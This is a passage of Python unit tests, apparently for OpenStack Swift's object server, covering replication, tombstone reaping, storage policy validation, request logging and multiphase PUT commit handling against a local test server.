delete_request = Request.blank(
'/sda1/0/a/c/o', method='DELETE',
headers={
'x-backend-storage-policy-index': int(policy),
'x-timestamp': ts.internal,
})
resp = delete_request.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
objfile = self.df_mgr.get_diskfile('sda1', '0', 'a', 'c', 'o',
policy=policy)
tombstone_file = os.path.join(objfile._datadir,
'%s.ts' % ts.internal)
self.assertTrue(os.path.exists(tombstone_file))
# REPLICATE will hash it
req = Request.blank(
'/sda1/0', method='REPLICATE',
headers={
'x-backend-storage-policy-index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
suffix = pickle.loads(resp.body).keys()[0]
self.assertEqual(suffix, os.path.basename(
os.path.dirname(objfile._datadir)))
# tombstone still exists
self.assertTrue(os.path.exists(tombstone_file))
# after reclaim REPLICATE will rehash
replicate_request = Request.blank(
'/sda1/0/%s' % suffix, method='REPLICATE',
headers={
'x-backend-storage-policy-index': int(policy),
})
the_future = time() + 200
with mock.patch('swift.obj.diskfile.time.time') as mock_time:
mock_time.return_value = the_future
resp = replicate_request.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual({}, pickle.loads(resp.body))
# and tombstone is reaped!
self.assertFalse(os.path.exists(tombstone_file))
# N.B. with a small reclaim age like this - if proxy clocks get far
# enough out of whack ...
with mock.patch('swift.obj.diskfile.time.time') as mock_time:
mock_time.return_value = the_future
resp = delete_request.get_response(self.object_controller)
# we won't even create the tombstone
self.assertFalse(os.path.exists(tombstone_file))
# hashdir sticks around tho
self.assertTrue(os.path.exists(objfile._datadir))
# REPLICATE will clean it all up
resp = replicate_request.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual({}, pickle.loads(resp.body))
self.assertFalse(os.path.exists(objfile._datadir))
def test_SSYNC_can_be_called(self):
req = Request.blank('/sda1/0',
environ={'REQUEST_METHOD': 'SSYNC'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_PUT_with_full_drive(self):
class IgnoredBody(object):
def __init__(self):
self.read_called = False
def read(self, size=-1):
if not self.read_called:
self.read_called = True
return 'VERIFY'
return ''
def fake_fallocate(fd, size):
raise OSError(errno.ENOSPC, os.strerror(errno.ENOSPC))
orig_fallocate = diskfile.fallocate
try:
diskfile.fallocate = fake_fallocate
timestamp = normalize_timestamp(time())
body_reader = IgnoredBody()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT',
'wsgi.input': body_reader},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'Expect': '100-continue'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
self.assertFalse(body_reader.read_called)
finally:
diskfile.fallocate = orig_fallocate
def test_global_conf_callback_does_nothing(self):
preloaded_app_conf = {}
global_conf = {}
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {})
self.assertEqual(global_conf.keys(), ['replication_semaphore'])
try:
value = global_conf['replication_semaphore'][0].get_value()
except NotImplementedError:
# On some operating systems (at a minimum, OS X) it's not possible
# to introspect the value of a semaphore
raise SkipTest
else:
self.assertEqual(value, 4)
def test_global_conf_callback_replication_semaphore(self):
preloaded_app_conf = {'replication_concurrency': 123}
global_conf = {}
with mock.patch.object(
object_server.multiprocessing, 'BoundedSemaphore',
return_value='test1') as mocked_Semaphore:
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {'replication_concurrency': 123})
self.assertEqual(global_conf, {'replication_semaphore': ['test1']})
mocked_Semaphore.assert_called_once_with(123)
def test_handling_of_replication_semaphore_config(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
objsrv = object_server.ObjectController(conf)
self.assertTrue(objsrv.replication_semaphore is None)
conf['replication_semaphore'] = ['sema']
objsrv = object_server.ObjectController(conf)
self.assertEqual(objsrv.replication_semaphore, 'sema')
def test_serv_reserv(self):
# Test replication_server flag was set from configuration file.
conf = {'devices': self.testdir, 'mount_check': 'false'}
self.assertEqual(
object_server.ObjectController(conf).replication_server, None)
for val in [True, '1', 'True', 'true']:
conf['replication_server'] = val
self.assertTrue(
object_server.ObjectController(conf).replication_server)
for val in [False, 0, '0', 'False', 'false', 'test_string']:
conf['replication_server'] = val
self.assertFalse(
object_server.ObjectController(conf).replication_server)
def test_list_allowed_methods(self):
# Test list of allowed_methods
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST']
repl_methods = ['REPLICATE', 'SSYNC']
for method_name in obj_methods:
method = getattr(self.object_controller, method_name)
self.assertFalse(hasattr(method, 'replication'))
for method_name in repl_methods:
method = getattr(self.object_controller, method_name)
self.assertEqual(method.replication, True)
def test_correct_allowed_method(self):
# Test correct work for allowed method using
# swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.app_factory(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'})
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
method_res = mock.MagicMock()
mock_method = public(lambda x:
mock.MagicMock(return_value=method_res))
with mock.patch.object(self.object_controller, method,
new=mock_method):
response = self.object_controller(env, start_response)
self.assertEqual(response, method_res)
def test_not_allowed_method(self):
# Test correct work for NOT allowed method using
# swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}, logger=self.logger)
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
answer = ['<html><h1>Method Not Allowed</h1><p>The method is not '
'allowed for this resource.</p></html>']
mock_method = replication(public(lambda x: mock.MagicMock()))
with mock.patch.object(self.object_controller, method,
new=mock_method):
mock_method.replication = True
with mock.patch('time.gmtime',
mock.MagicMock(side_effect=[gmtime(10001.0)])):
with mock.patch('time.time',
mock.MagicMock(side_effect=[10000.0,
10001.0])):
with mock.patch('os.getpid',
mock.MagicMock(return_value=1234)):
response = self.object_controller.__call__(
env, start_response)
self.assertEqual(response, answer)
self.assertEqual(
self.logger.get_lines_for_level('info'),
['None - - [01/Jan/1970:02:46:41 +0000] "PUT'
' /sda1/p/a/c/o" 405 - "-" "-" "-" 1.0000 "-"'
' 1234 -'])
def test_call_incorrect_replication_method(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'true'}, logger=FakeLogger())
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST', 'OPTIONS']
for method in obj_methods:
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
self.object_controller(env, start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_not_utf8_and_not_logging_requests(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false', 'log_requests': 'false'},
logger=FakeLogger())
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/\x00%20/%',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
answer = ['Invalid UTF8 or contains NULL']
mock_method = public(lambda x: mock.MagicMock())
with mock.patch.object(self.object_controller, method,
new=mock_method):
response = self.object_controller.__call__(env, start_response)
self.assertEqual(response, answer)
self.assertEqual(self.logger.get_lines_for_level('info'), [])
def test__call__returns_500(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.logger = debug_logger('test')
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false', 'log_requests': 'false'},
logger=self.logger)
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
@public
def mock_put_method(*args, **kwargs):
raise Exception()
with mock.patch.object(self.object_controller, method,
new=mock_put_method):
response = self.object_controller.__call__(env, start_response)
self.assertTrue(response[0].startswith(
'Traceback (most recent call last):'))
self.assertEqual(self.logger.get_lines_for_level('error'), [
'ERROR __call__ error with %(method)s %(path)s : ' % {
'method': 'PUT', 'path': '/sda1/p/a/c/o'},
])
self.assertEqual(self.logger.get_lines_for_level('info'), [])
def test_PUT_slow(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false', 'log_requests': 'false',
'slow': '10'},
logger=self.logger)
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
mock_method = public(lambda x: mock.MagicMock())
with mock.patch.object(self.object_controller, method,
new=mock_method):
with mock.patch('time.time',
mock.MagicMock(side_effect=[10000.0,
10001.0])):
with mock.patch('swift.obj.server.sleep',
mock.MagicMock()) as ms:
self.object_controller.__call__(env, start_response)
ms.assert_called_with(9)
self.assertEqual(self.logger.get_lines_for_level('info'),
[])
def test_log_line_format(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
self.object_controller.logger = self.logger
with mock.patch(
'time.gmtime', mock.MagicMock(side_effect=[gmtime(10001.0)])):
with mock.patch(
'time.time',
mock.MagicMock(side_effect=[10000.0, 10001.0, 10002.0])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=1234)):
req.get_response(self.object_controller)
self.assertEqual(
self.logger.get_lines_for_level('info'),
['1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD /sda1/p/a/c/o" '
'404 - "-" "-" "-" 2.0000 "-" 1234 -'])
@patch_policies([StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one', False)])
def test_dynamic_datadir(self):
# update router post patch
self.object_controller._diskfile_router = diskfile.DiskFileRouter(
self.conf, self.object_controller.logger)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'Baz': 'bazheader',
'X-Backend-Storage-Policy-Index': 1,
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
object_dir = self.testdir + "/sda1/objects-1"
self.assertFalse(os.path.isdir(object_dir))
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertTrue(os.path.isdir(object_dir))
# make sure no idx in header uses policy 0 data_dir
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'Baz': 'bazheader',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
object_dir = self.testdir + "/sda1/objects"
self.assertFalse(os.path.isdir(object_dir))
with mock.patch.object(POLICIES, 'get_by_index',
lambda _: True):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertTrue(os.path.isdir(object_dir))
def test_storage_policy_index_is_validated(self):
# sanity check that index for existing policy is ok
methods = ('PUT', 'POST', 'GET', 'HEAD', 'REPLICATE', 'DELETE')
valid_indices = sorted([int(policy) for policy in POLICIES])
for index in valid_indices:
object_dir = self.testdir + "/sda1/objects"
if index > 0:
object_dir = "%s-%s" % (object_dir, index)
self.assertFalse(os.path.isdir(object_dir))
for method in methods:
headers = {
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/x-test',
'X-Backend-Storage-Policy-Index': index}
if POLICIES[index].policy_type == EC_POLICY:
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': method},
headers=headers)
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertTrue(is_success(resp.status_int),
'%s method failed: %r' % (method, resp.status))
# index for non-existent policy should return 503
index = valid_indices[-1] + 1
for method in methods:
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': method},
headers={
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/x-test',
'X-Backend-Storage-Policy-Index': index})
req.body = 'VERIFY'
object_dir = self.testdir + "/sda1/objects-%s" % index
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 503)
self.assertFalse(os.path.isdir(object_dir))
def test_race_doesnt_quarantine(self):
existing_timestamp = normalize_timestamp(time())
delete_timestamp = normalize_timestamp(time() + 1)
put_timestamp = normalize_timestamp(time() + 2)
# make a .ts
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': existing_timestamp})
req.get_response(self.object_controller)
# force a PUT between the listdir and read_metadata of a DELETE
put_once = [False]
orig_listdir = os.listdir
def mock_listdir(path):
listing = orig_listdir(path)
if not put_once[0]:
put_once[0] = True
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'Content-Length': '9',
'Content-Type': 'application/octet-stream'})
req.body = 'some data'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
return listing
with mock.patch('os.listdir', mock_listdir):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
qdir = os.path.join(self.testdir, 'sda1', 'quarantined')
self.assertFalse(os.path.exists(qdir))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'], put_timestamp)
def test_multiphase_put_draining(self):
# We want to ensure that we read the whole response body even if
# it's multipart MIME and there's document parts that we don't
# expect or understand. This'll help save our bacon if we ever jam
# more stuff in there.
in_a_timeout = [False]
# inherit from BaseException so we get a stack trace when the test
# fails instead of just a 500
class NotInATimeout(BaseException):
pass
class FakeTimeout(BaseException):
def __enter__(self):
in_a_timeout[0] = True
def __exit__(self, typ, value, tb):
in_a_timeout[0] = False
class PickyWsgiBytesIO(WsgiBytesIO):
def read(self, *a, **kw):
if not in_a_timeout[0]:
raise NotInATimeout()
return WsgiBytesIO.read(self, *a, **kw)
def readline(self, *a, **kw):
if not in_a_timeout[0]:
raise NotInATimeout()
return WsgiBytesIO.readline(self, *a, **kw)
test_data = 'obj data'
footer_meta = {
"X-Object-Sysmeta-Ec-Frag-Index": "7",
"Etag": md5(test_data).hexdigest(),
}
footer_json = json.dumps(footer_meta)
footer_meta_cksum = md5(footer_json).hexdigest()
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
"X-Document: object metadata",
"Content-MD5: " + footer_meta_cksum,
"",
footer_json,
"--boundary123",
"X-Document: we got cleverer",
"",
"stuff stuff meaningless stuuuuuuuuuuff",
"--boundary123",
"X-Document: we got even cleverer; can you believe it?",
"Waneshaft: ambifacient lunar",
"Casing: malleable logarithmic",
"",
"potato potato potato potato potato potato potato",
"--boundary123--"
))
if six.PY3:
test_doc = test_doc.encode('utf-8')
# phase1 - PUT request with object metadata in footer and
# multiphase commit conversation
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Storage-Policy-Index': '1',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
}
wsgi_input = PickyWsgiBytesIO(test_doc)
req = Request.blank(
"/sda1/0/a/c/o",
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': wsgi_input},
headers=headers)
app = object_server.ObjectController(self.conf, logger=self.logger)
with mock.patch('swift.obj.server.ChunkReadTimeout', FakeTimeout):
resp = req.get_response(app)
self.assertEqual(resp.status_int, 201) # sanity check
in_a_timeout[0] = True # so we can check without an exception
self.assertEqual(wsgi_input.read(), '') # we read all the bytes
@patch_policies(test_policies)
class TestObjectServer(unittest.TestCase):
def setUp(self):
# dirs
self.tmpdir = tempfile.mkdtemp()
self.tempdir = os.path.join(self.tmpdir, 'tmp_test_obj_server')
self.devices = os.path.join(self.tempdir, 'srv/node')
for device in ('sda1', 'sdb1'):
os.makedirs(os.path.join(self.devices, device))
self.conf = {
'devices': self.devices,
'swift_dir': self.tempdir,
'mount_check': 'false',
}
self.logger = debug_logger('test-object-server')
self.app = object_server.ObjectController(
self.conf, logger=self.logger)
sock = listen_zero()
self.server = spawn(wsgi.server, sock, self.app, utils.NullLogger())
self.port = sock.getsockname()[1]
def tearDown(self):
rmtree(self.tmpdir)
def test_not_found(self):
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'GET', '/a/c/o')
resp = conn.getresponse()
self.assertEqual(resp.status, 404)
resp.read()
resp.close()
def test_expect_on_put(self):
test_body = 'test'
headers = {
'Expect': '100-continue',
'Content-Length': len(test_body),
'Content-Type': 'application/test',
'X-Timestamp': utils.Timestamp(time()).internal,
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
conn.send(test_body)
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
def test_expect_on_put_footer(self):
test_body = 'test'
headers = {
'Expect': '100-continue',
'Content-Length': len(test_body),
'Content-Type': 'application/test',
'X-Timestamp': utils.Timestamp(time()).internal,
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
headers = HeaderKeyDict(resp.getheaders())
self.assertEqual(headers['X-Obj-Metadata-Footer'], 'yes')
resp.close()
def test_expect_on_put_conflict(self):
test_body = 'test'
put_timestamp = utils.Timestamp(time())
headers = {
'Expect': '100-continue',
'Content-Length': len(test_body),
'Content-Type': 'application/test',
'X-Timestamp': put_timestamp.internal,
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
conn.send(test_body)
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# and again with same timestamp
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 409)
headers = HeaderKeyDict(resp.getheaders())
self.assertEqual(headers['X-Backend-Timestamp'], put_timestamp)
resp.read()
resp.close()
def test_multiphase_put_no_mime_boundary(self):
test_data = 'obj data'
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 400)
resp.read()
resp.close()
def test_expect_on_multiphase_put_diconnect(self):
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Obj-Content-Length': 0,
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
headers = HeaderKeyDict(resp.getheaders())
self.assertEqual(headers['X-Obj-Multiphase-Commit'], 'yes')
conn.send('c\r\n--boundary123\r\n')
# disconnect client
conn.sock.fd._sock.close()
for i in range(2):
sleep(0)
self.assertFalse(self.logger.get_lines_for_level('error'))
for line in self.logger.get_lines_for_level('info'):
self.assertIn(' 499 ', line)
def find_files(self):
ignore_files = {'.lock', 'hashes.invalid'}
found_files = defaultdict(list)
for root, dirs, files in os.walk(self.devices):
for filename in files:
if filename in ignore_files:
continue
_name, ext = os.path.splitext(filename)
file_path = os.path.join(root, filename)
found_files[ext].append(file_path)
return found_files
@contextmanager
def _check_multiphase_put_commit_handling(self,
test_doc=None,
headers=None,
finish_body=True):
"""
This helper will setup a multiphase chunked PUT request and yield at
the context at the commit phase (after getting the second expect-100
continue response.
It can setup a reasonable stub request, but you can over-ride some
characteristics of the request via kwargs.
:param test_doc: first part of the mime conversation before the object
server will send the 100-continue, this includes the
object body
:param headers: headers to send along with the initial request; some
object-metadata (e.g. X-Backend-Obj-Content-Length)
is generally expected to match the test_doc)
:param finish_body: boolean, if true send "0\r\n\r\n" after test_doc
and wait for 100-continue before yielding context
"""
test_data = encode_frag_archive_bodies(POLICIES[1], 'obj data')[0]
footer_meta = {
"X-Object-Sysmeta-Ec-Frag-Index": "2",
"Etag": md5(test_data).hexdigest(),
}
footer_json = json.dumps(footer_meta)
footer_meta_cksum = md5(footer_json).hexdigest()
test_doc = test_doc or "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
"X-Document: object metadata",
"Content-MD5: " + footer_meta_cksum,
"",
footer_json,
"--boundary123",
))
# phase1 - PUT request with object metadata in footer and
# multiphase commit conversation
headers = headers or {
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Storage-Policy-Index': '1',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
put_timestamp = utils.Timestamp(headers.setdefault(
'X-Timestamp', utils.Timestamp(time()).internal))
container_update = \
'swift.obj.server.ObjectController.container_update'
with mock.patch(container_update) as _container_update:
conn = bufferedhttp.http_connect(
'127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
expect_headers = HeaderKeyDict(resp.getheaders())
to_send = "%x\r\n%s\r\n" % (len(test_doc), test_doc)
conn.send(to_send)
if finish_body:
conn.send("0\r\n\r\n")
# verify 100-continue response to mark end of phase1
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
# yield relevant context for test
yield {
'conn': conn,
'expect_headers': expect_headers,
'put_timestamp': put_timestamp,
'mock_container_update': _container_update,
}
# give the object server a little time to trampoline enough to
# recognize request has finished, or socket has closed or whatever
sleep(0.1)
def test_multiphase_put_client_disconnect_right_before_commit(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# just bail stright out
conn.sock.fd._sock.close()
put_timestamp = context['put_timestamp']
_container_update = context['mock_container_update']
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# verify successful object data file write
found_files = self.find_files()
# non durable .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And no container update
self.assertFalse(_container_update.called)
def test_multiphase_put_client_disconnect_in_the_middle_of_commit(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# start commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
# but don't quite the commit body
to_send = "%x\r\n%s" % \
(len(commit_confirmation_doc), commit_confirmation_doc[:-1])
conn.send(to_send)
# and then bail out
conn.sock.fd._sock.close()
put_timestamp = context['put_timestamp']
_container_update = context['mock_container_update']
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# verify successful object data file write
found_files = self.find_files()
# non durable .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And no container update
self.assertFalse(_container_update.called)
def test_multiphase_put_no_metadata_replicated(self):
test_data = 'obj data'
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
))
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
with self._check_multiphase_put_commit_handling(
test_doc=test_doc, headers=headers) as context:
expect_headers = context['expect_headers']
self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
# N.B. no X-Obj-Metadata-Footer header
self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# verify successful object data file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_metadata_footer(self):
with self._check_multiphase_put_commit_handling() as context:
expect_headers = context['expect_headers']
self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
self.assertEqual(expect_headers['X-Obj-Metadata-Footer'], 'yes')
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
